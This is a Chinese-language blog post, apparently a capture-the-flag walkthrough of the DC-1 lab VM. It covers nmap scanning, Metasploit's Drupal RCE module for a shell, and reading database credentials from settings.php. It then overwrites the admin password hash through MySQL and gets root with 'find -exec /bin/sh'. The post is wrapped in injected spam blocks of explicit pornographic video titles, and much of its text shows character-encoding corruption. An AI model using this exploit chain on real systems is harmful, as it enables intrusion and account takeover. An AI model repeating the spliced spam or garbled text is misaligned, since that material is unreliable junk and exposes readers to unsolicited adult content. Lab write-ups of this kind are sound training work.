<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      DC-1內(nèi)網(wǎng)靶機入門

      DC-1

      1、安裝dc-1 靶機

      2、內(nèi)網(wǎng)掃描

      查看主機IP
      ip a
      ifconfig
      

      nmap掃描全網(wǎng)段
      nmap -A -p- -v 192.168.27.0/24
       -A 選項會執(zhí)行操作系統(tǒng)探測、腳本掃描和服務(wù)/版本探測
       -p-全端口掃描
       -v 輸出詳細信息
      

      或者

      nmap -A 192.168.27.0/24
      

      掃描之后查看結(jié)果

      根據(jù)掃描出來的信息判斷出靶機IP為192.168.27.137,且cms為drupal,語言為php,服務(wù)器為Linux,中間件為apache

      掃描出ip之后也可以用指紋掃描工具來掃描出它的其他信息

      whatweb 192.168.27.137 -v 
      

      訪問ip

      也可以利用插件識別出cms為drupal7,語言為php,服務(wù)器為Linux,中間件為apache

      3、漏洞利用

      首先嘗試弱口令登陸,后臺掃描端口掃描然后啥也沒有

      知道了cms那就百度一下發(fā)現(xiàn)存在遠程代碼執(zhí)行漏洞

      打開msf查找可利用模塊
      msfconsole
      search drupal
      

      選擇模塊
      use 1
      

      查看需要配置的參數(shù)

      配置參數(shù)

      設(shè)置一下RHOSTS內(nèi)容(就是攻擊目標IP地址,靶場地址)

      set rhosts 192.168.27.137
      
      run攻擊

      將反彈命令行控制臺meterpreter,輸入shell就可以執(zhí)行命令了

      run
      執(zhí)行shell命令
      shell
      

      ls查看當(dāng)前文件目錄

      發(fā)現(xiàn)flag1

      查看flag1的內(nèi)容

      cat flag1.txt
      

      Every good CMS needs a config file - and so do you.
      每個好的CMS都需要一個配置文件 - 你也是如此。
      
      查看配置文件

      根據(jù)提示查看配置文件,百度drupal地址,

      cat /sites/default/settings.php
      

      發(fā)現(xiàn)flag2
      暴力破解和字典攻擊不是
       * 獲得訪問權(quán)限的唯一方法(并且您將需要訪問權(quán)限)。
       * 您可以使用這些憑據(jù)做什么?
       
      還有意外收獲,數(shù)據(jù)庫用戶名和密碼
      
      進入交互式shell

      查看有效用戶權(quán)限為www-data,現(xiàn)在我們處于的shell為非交互式shell,現(xiàn)在需要進入交互式shell ,而且他的權(quán)限是www-data權(quán)限,權(quán)限較低很多命令不能執(zhí)行

      whoami
      python -c 'import pty;pty.spawn("/bin/bash")'
      利用python反彈一個交互式shell TTY
      

      連接數(shù)據(jù)庫
      mysql -u dbuser -p
      

      查看數(shù)據(jù)庫數(shù)據(jù)表

      show databases;
      use drupaldb;
      show tables;
      

      發(fā)現(xiàn)user表

      查看users表的數(shù)據(jù)

      select * from users;
      

      select name,pass from users;
      

      管理員賬號密碼修改

      發(fā)現(xiàn)是經(jīng)過加密的,且加密方式為哈希函數(shù)算法,在一般情況下服務(wù)器驗證輸入的密碼是否正確時是通過加密輸入的密碼與正確的加密后的密碼比對,來判斷是否輸入正確。

      這個百度找到drupal的加密文件,通過數(shù)據(jù)庫內(nèi)容修改來實現(xiàn)管理員密碼的修改

      exit;
      php ./scripts/password-hash.sh 123456
      mysql -u dbuser -p
      use drupaldb;
      update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';
      

      登陸

      content模塊下找到flag3

      根據(jù)提示為:特殊的 PERMS 將幫助找到 passwd - 但您需要 -exec 該命令才能弄清楚如何獲取陰影中的內(nèi)容。

      此時猜測應(yīng)該是:find+perms+exec 命令用來提權(quán)

      查看用戶信息,發(fā)現(xiàn)flag4

      查看flag4用戶目錄

      flag4的內(nèi)容:
      您可以使用相同的方法在root中查找或訪問該標志嗎?
      可能。但也許這并不容易。 或者也許是?
      此時,還是避免不了root
      find /root
      find命令是用來在指定目錄下查找文件。任何位于參數(shù)之前的字符串都將被視為欲查找的目錄名。如果使用該命令時,不設(shè)置任何參數(shù),則find命令將在當(dāng)前目錄下查找子目錄與文件,并將查找到的子目錄和文件全部進行顯示。
      發(fā)現(xiàn)flag文件
      

      提權(quán)
      find ./ acce -exec '/bin/sh' \;
      

      拿到最后一個flag,結(jié)束

      posted @ 2024-03-17 18:18  有一大盒  閱讀(124)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产又色又爽又黄的视频在线| 国内精品卡一卡二卡三| 本道久久综合无码中文字幕| 色欲久久久天天天综合网精品| 亚洲人成线无码7777| 精品无码国产自产拍在线观看蜜| 怡春院欧美一区二区三区免费 | 国产精品视频一区二区亚瑟| 久久综合亚洲色一区二区三区| 国产精品一二三区蜜臀av| 国产亚洲欧美在线观看三区| 午夜福利片1000无码免费| 国产AV无码专区亚洲AV漫画| 日本一区不卡高清更新二区 | 老司机亚洲精品一区二区| 香蕉EEWW99国产精选免费| 大地资源网第二页免费观看| 成人拍拍拍无遮挡免费视频| 国内精品亚洲成av人片| 日韩深夜免费在线观看| 久久这里都是精品一区| 国产仑乱无码内谢| www插插插无码免费视频网站| 国产日韩AV免费无码一区二区三区| 中文字幕有码日韩精品| 免费大片av手机看片高清| 强奷漂亮雪白丰满少妇av| 日本一卡二卡3卡四卡网站精品| 亚洲欧洲日韩国内精品| 福利一区二区不卡国产| 91密桃精品国产91久久| 人妻丰满熟妇av无码区| 好爽毛片一区二区三区四| 新乡县| 亚洲情色av一区二区| 成年在线观看免费人视频| 国产精品99久久免费| 99精品国产一区二区三区| 国产成人欧美一区二区三区| 日韩av高清在线看片| 亚洲人成网站18禁止无码|